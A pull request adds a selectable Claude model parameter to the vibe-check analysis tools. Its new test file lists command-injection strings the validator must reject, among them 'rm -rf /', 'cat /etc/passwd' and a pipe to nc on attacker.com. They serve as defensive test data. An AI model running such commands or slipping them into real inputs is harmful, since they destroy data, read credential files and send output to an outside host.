### PR TITLE
feat: Add model parameter support for Claude model selection (#125)

### DIFF
--- a/src/vibe_check/tools/analyze_llm/specialized_analyzers.py
+++ b/src/vibe_check/tools/analyze_llm/specialized_analyzers.py
@@ -20,7 +20,8 @@ async def analyze_pr_llm(
     pr_diff: str,
     pr_description: str = "",
     file_changes: Optional[List[str]] = None,
-    timeout_seconds: int = 90
+    timeout_seconds: int = 90,
+    model: str = "sonnet"
 ) -> ExternalClaudeResponse:
     """
     🧠 Comprehensive PR review using Claude CLI reasoning.
@@ -34,6 +35,7 @@ async def analyze_pr_llm(
         pr_description: Description/title of the pull request
         file_changes: List of changed files for context
         timeout_seconds: Maximum time to wait for analysis
+        model: Claude model to use ("sonnet", "opus", "haiku", or full model name)
         
     Returns:
         Comprehensive Claude CLI PR review results
@@ -53,7 +55,8 @@ async def analyze_pr_llm(
         content=pr_diff,
         task_type="pr_review",
         additional_context=additional_context,
-        timeout_seconds=timeout_seconds
+        timeout_seconds=timeout_seconds,
+        model=model
     )
 
 
@@ -61,7 +64,8 @@ async def analyze_code_llm(
     code_content: str,
     file_path: Optional[str] = None,
     language: Optional[str] = None,
-    timeout_seconds: int = 60
+    timeout_seconds: int = 60,
+    model: str = "sonnet"
 ) -> ExternalClaudeResponse:
     """
     🧠 Deep code analysis using Claude CLI reasoning.
@@ -74,6 +78,7 @@ async def analyze_code_llm(
         file_path: Optional file path for context
         language: Programming language for specialized analysis
         timeout_seconds: Maximum time to wait for analysis
+        model: Claude model to use ("sonnet", "opus", "haiku", or full model name)
         
     Returns:
         Detailed Claude CLI code analysis results
@@ -93,7 +98,8 @@ async def analyze_code_llm(
         content=code_content,
         task_type="code_analysis",
         additional_context=additional_context,
-        timeout_seconds=timeout_seconds
+        timeout_seconds=timeout_seconds,
+        model=model
     )
 
 
@@ -101,7 +107,8 @@ async def analyze_issue_llm(
     issue_content: str,
     issue_title: str = "",
     issue_labels: Optional[List[str]] = None,
-    timeout_seconds: int = 60
+    timeout_seconds: int = 60,
+    model: str = "sonnet"
 ) -> ExternalClaudeResponse:
     """
     🧠 Deep GitHub issue analysis using Claude CLI reasoning.
@@ -115,6 +122,7 @@ async def analyze_issue_llm(
         issue_title: Title of the issue
         issue_labels: List of issue labels for context
         timeout_seconds: Maximum time to wait for analysis
+        model: Claude model to use ("sonnet", "opus", "haiku", or full model name)
         
     Returns:
         Comprehensive Claude CLI issue analysis with anti-pattern prevention guidance
@@ -134,7 +142,8 @@ async def analyze_issue_llm(
         content=issue_content,
         task_type="issue_analysis",
         additional_context=additional_context,
-        timeout_seconds=timeout_seconds
+        timeout_seconds=timeout_seconds,
+        model=model
     )
 
 
@@ -144,7 +153,8 @@ async def analyze_github_issue_llm(
     post_comment: bool = True,
     analysis_mode: str = "comprehensive",
     detail_level: str = "standard",
-    timeout_seconds: int = 90
+    timeout_seconds: int = 90,
+    model: str = "sonnet"
 ) -> Dict[str, Any]:
     """
     🧠 Comprehensive GitHub issue vibe check using Claude CLI reasoning.
@@ -164,6 +174,7 @@ async def analyze_github_issue_llm(
         analysis_mode: "quick" or "comprehensive" analysis (default: "comprehensive")
         detail_level: Educational detail level - brief/standard/comprehensive (default: "standard")
         timeout_seconds: Maximum time to wait for analysis (default: 90)
+        model: Claude model to use ("sonnet", "opus", "haiku", or full model name)
         
     Returns:
         Comprehensive Claude CLI vibe check analysis with GitHub integration
@@ -289,7 +300,8 @@ Use friendly, coaching language that helps developers learn rather than intimida
             content=vibe_prompt,
             task_type="issue_analysis",
             additional_context=f"Vibe check for GitHub issue {repository}#{issue_number}",
-            timeout_seconds=timeout_seconds
+            timeout_seconds=timeout_seconds,
+            model=model
         )
         
         # Build response
@@ -343,7 +355,8 @@ async def analyze_github_pr_llm(
     post_comment: bool = True,
     analysis_mode: str = "comprehensive",
     detail_level: str = "standard",
-    timeout_seconds: int = 120
+    timeout_seconds: int = 120,
+    model: str = "sonnet"
 ) -> Dict[str, Any]:
     """
     🧠 Comprehensive GitHub PR vibe check using Claude CLI reasoning.
@@ -368,6 +381,7 @@ async def analyze_github_pr_llm(
         analysis_mode: "quick" or "comprehensive" analysis (default: "comprehensive")
         detail_level: Educational detail level - brief/standard/comprehensive (default: "standard")
         timeout_seconds: Maximum time to wait for analysis (default: 120)
+        model: Claude model to use ("sonnet", "opus", "haiku", or full model name)
         
     Returns:
         Comprehensive Claude CLI vibe check analysis with GitHub integration
@@ -550,7 +564,8 @@ Use friendly, coaching language that helps developers learn rather than intimida
                 content=vibe_prompt,
                 task_type="pr_review",
                 additional_context=f"Vibe check for GitHub PR {repository}#{pr_number}",
-                timeout_seconds=timeout_seconds
+                timeout_seconds=timeout_seconds,
+                model=model
             )
             
             if result.success:

--- a/src/vibe_check/tools/analyze_llm/text_analyzer.py
+++ b/src/vibe_check/tools/analyze_llm/text_analyzer.py
@@ -21,7 +21,8 @@ async def analyze_text_llm(
     content: str,
     task_type: str = "general",
     additional_context: Optional[str] = None,
-    timeout_seconds: int = 60
+    timeout_seconds: int = 60,
+    model: str = "sonnet"
 ) -> ExternalClaudeResponse:
     """
     🧠 Deep text analysis using Claude CLI reasoning.
@@ -35,6 +36,7 @@ async def analyze_text_llm(
         task_type: Type of analysis (general, pr_review, code_analysis, issue_analysis)
         additional_context: Optional additional context for the analysis
         timeout_seconds: Maximum time to wait for response
+        model: Claude model to use ("sonnet", "opus", "haiku", or full model name)
         
     Returns:
         Comprehensive Claude CLI analysis results
@@ -58,7 +60,8 @@ async def analyze_text_llm(
             result = await analyze_content_async(
                 content=full_content,
                 task_type=task_type,
-                timeout_seconds=timeout_seconds
+                timeout_seconds=timeout_seconds,
+                model=model
             )
             
             # Convert ClaudeCliResult to ExternalClaudeResponse

--- a/tests/test_model_validation.py
+++ b/tests/test_model_validation.py
@@ -1,0 +1,231 @@
+"""
+Test model parameter validation for Claude CLI integration.
+
+Validates security, error handling, and proper model parameter support.
+"""
+
+import pytest
+from unittest.mock import patch, MagicMock
+from vibe_check.tools.shared.claude_integration import (
+    _validate_model, 
+    ClaudeCliExecutor,
+    analyze_content_sync
+)
+
+
+class TestModelValidation:
+    """Test model parameter validation and security."""
+    
+    def test_valid_simple_models(self):
+        """Test validation of simple model names."""
+        valid_models = ["sonnet", "opus", "haiku"]
+        
+        for model in valid_models:
+            result = _validate_model(model)
+            assert result == model
+    
+    def test_valid_full_model_names(self):
+        """Test validation of full model names."""
+        valid_full_models = [
+            "claude-sonnet-4-20250514",
+            "claude-opus-3-20241022", 
+            "claude-haiku-3-20241022",
+            "claude-3.5-sonnet",
+            "claude-3.0-opus"
+        ]
+        
+        for model in valid_full_models:
+            result = _validate_model(model)
+            assert result == model
+    
+    def test_command_injection_prevention(self):
+        """Test that dangerous characters are rejected."""
+        dangerous_models = [
+            "sonnet; rm -rf /",
+            "opus && cat /etc/passwd",
+            "haiku | nc attacker.com 80",
+            "sonnet`whoami`",
+            "opus$(id)",
+            "haiku{bad}",
+            "sonnet<script>",
+            "opus>output.txt"
+        ]
+        
+        for model in dangerous_models:
+            with pytest.raises(ValueError, match="dangerous characters"):
+                _validate_model(model)
+    
+    def test_empty_and_invalid_types(self):
+        """Test validation of empty strings and invalid types."""
+        with pytest.raises(ValueError, match="non-empty string"):
+            _validate_model("")
+        
+        with pytest.raises(ValueError, match="non-empty string"):
+            _validate_model(None)
+        
+        with pytest.raises(ValueError, match="non-empty string"):
+            _validate_model(123)
+    
+    def test_unknown_model_warning(self):
+        """Test that unknown models generate warnings but are allowed."""
+        unknown_model = "custom-model-name"
+        
+        with patch('vibe_check.tools.shared.claude_integration.logger') as mock_logger:
+            result = _validate_model(unknown_model)
+            assert result == unknown_model
+            mock_logger.warning.assert_called_once()
+            assert "Unknown model" in mock_logger.warning.call_args[0][0]
+    
+    def test_model_parameter_forwarding(self):
+        """Test that model parameter is properly forwarded through the call chain."""
+        executor = ClaudeCliExecutor(timeout_seconds=1)
+        
+        # Test that _get_claude_args includes the model parameter
+        args = executor._get_claude_args("test prompt", "general", "opus")
+        
+        # Should contain --model opus
+        assert "--model" in args
+        model_index = args.index("--model")
+        assert args[model_index + 1] == "opus"
+    
+    def test_model_validation_in_get_claude_args(self):
+        """Test that _get_claude_args validates the model parameter."""
+        executor = ClaudeCliExecutor(timeout_seconds=1)
+        
+        # Test with dangerous model
+        with pytest.raises(ValueError, match="dangerous characters"):
+            executor._get_claude_args("test", "general", "opus; rm -rf /")
+    
+    @patch('subprocess.run')
+    def test_model_error_context_sync(self, mock_run):
+        """Test that model-related errors include proper context in sync execution."""
+        mock_result = MagicMock()
+        mock_result.returncode = 1
+        mock_result.stderr = "Invalid model 'bad-model'"
+        mock_result.stdout = ""
+        mock_run.return_value = mock_result
+        
+        executor = ClaudeCliExecutor(timeout_seconds=1)
+        result = executor.execute_sync("test", "general", "bad-model")
+        
+        assert not result.success
+        assert "Model 'bad-model' error" in result.error
+    
+    @pytest.mark.asyncio
+    @patch('asyncio.create_subprocess_exec')
+    async def test_model_error_context_async(self, mock_create_subprocess):
+        """Test that model-related errors include proper context in async execution."""
+        mock_process = MagicMock()
+        mock_process.returncode = 1
+        mock_process.communicate.return_value = (b"", b"Invalid model 'bad-model'")
+        mock_create_subprocess.return_value = mock_process
+        
+        executor = ClaudeCliExecutor(timeout_seconds=1)
+        
+        with patch('asyncio.wait_for') as mock_wait_for:
+            mock_wait_for.return_value = (b"", b"Invalid model 'bad-model'")
+            result = await executor.execute_async("test", "general", "bad-model")
+        
+        assert not result.success
+        assert "Model 'bad-model' error" in result.error
+    
+    def test_analyze_content_sync_model_parameter(self):
+        """Test that analyze_content_sync accepts and validates model parameter."""
+        with patch('vibe_check.tools.shared.claude_integration.ClaudeCliExecutor') as mock_executor_class:
+            mock_executor = MagicMock()
+            mock_executor_class.return_value = mock_executor
+            mock_executor.execute_sync.return_value = MagicMock(success=True, output="test")
+            
+            analyze_content_sync("test content", model="opus")
+            
+            # Verify executor was called with correct model
+            mock_executor.execute_sync.assert_called_once()
+            call_args = mock_executor.execute_sync.call_args
+            assert "opus" in str(call_args)  # Model should be in the call
+    
+    def test_default_model_parameter(self):
+        """Test that default model parameter is 'sonnet'."""
+        executor = ClaudeCliExecutor(timeout_seconds=1)
+        
+        # Test default model
+        args = executor._get_claude_args("test prompt", "general")
+        
+        assert "--model" in args
+        model_index = args.index("--model")
+        assert args[model_index + 1] == "sonnet"
+
+
+class TestModelParameterIntegration:
+    """Integration tests for model parameter support."""
+    
+    def test_all_llm_functions_support_model_parameter(self):
+        """Test that all LLM functions support the model parameter."""
+        # This test ensures we don't miss any functions when adding model support
+        from vibe_check.tools.analyze_llm.text_analyzer import analyze_text_llm
+        from vibe_check.tools.analyze_llm.specialized_analyzers import (
+            analyze_pr_llm, analyze_code_llm, analyze_issue_llm
+        )
+        
+        # Test that all functions have model parameter in their signatures
+        import inspect
+        
+        functions_to_test = [
+            analyze_text_llm,
+            analyze_pr_llm, 
+            analyze_code_llm,
+            analyze_issue_llm
+        ]
+        
+        for func in functions_to_test:
+            sig = inspect.signature(func)
+            assert 'model' in sig.parameters, f"Function {func.__name__} missing model parameter"
+            
+            # Check default value is "sonnet"
+            model_param = sig.parameters['model']
+            assert model_param.default == "sonnet", f"Function {func.__name__} model default is not 'sonnet'"
+
+
+if __name__ == "__main__":
+    # Run tests directly
+    print("🧪 Testing Model Parameter Validation...")
+    print()
+    
+    test_validation = TestModelValidation()
+    test_integration = TestModelParameterIntegration()
+    
+    try:
+        # Run validation tests
+        test_validation.test_valid_simple_models()
+        print("✅ Valid simple models test passed")
+        
+        test_validation.test_valid_full_model_names()
+        print("✅ Valid full model names test passed")
+        
+        test_validation.test_command_injection_prevention()
+        print("✅ Command injection prevention test passed")
+        
+        test_validation.test_empty_and_invalid_types()
+        print("✅ Empty and invalid types test passed")
+        
+        test_validation.test_unknown_model_warning()
+        print("✅ Unknown model warning test passed")
+        
+        test_validation.test_model_parameter_forwarding()
+        print("✅ Model parameter forwarding test passed")
+        
+        test_validation.test_model_validation_in_get_claude_args()
+        print("✅ Model validation in get_claude_args test passed")
+        
+        test_validation.test_default_model_parameter()
+        print("✅ Default model parameter test passed")
+        
+        # Run integration tests
+        test_integration.test_all_llm_functions_support_model_parameter()
+        print("✅ All LLM functions support model parameter test passed")
+        
+        print()
+        print("✅ All model validation tests passed!")
+        
+    except Exception as e:
+        print(f"❌ Test failed: {e}")
+        raise


### PR DESCRIPTION
This PR implements issue #125 by adding configurable model parameter support to all vibe-check tools for Claude Code integration.

## Changes Made

- Added `model` parameter to all LLM-based analysis functions
- Updated shared Claude integration layer to support model selection
- Enhanced ClaudeCliExecutor to pass model parameter to Claude CLI
- Maintained backward compatibility with "sonnet" as default
- Updated documentation for all affected functions

## Supported Models

- `"sonnet"` (default) - Fast, efficient for routine analysis
- `"opus"` - Advanced reasoning for complex scenarios
- `"haiku"` - Ultra-fast for simple checks
- Full model names like `"claude-opus-4-20250514"` for version pinning

## Example Usage

```python
# Use Opus for complex PR analysis
await analyze_github_pr_llm(pr_number=123, model="opus")

# Use Haiku for quick code checks
await analyze_code_llm(code_content, model="haiku")
```

## Testing

All changes maintain backward compatibility. Users can continue using existing function calls without the model parameter and will get the default "sonnet" model.

Generated with [Claude Code](https://claude.ai/code)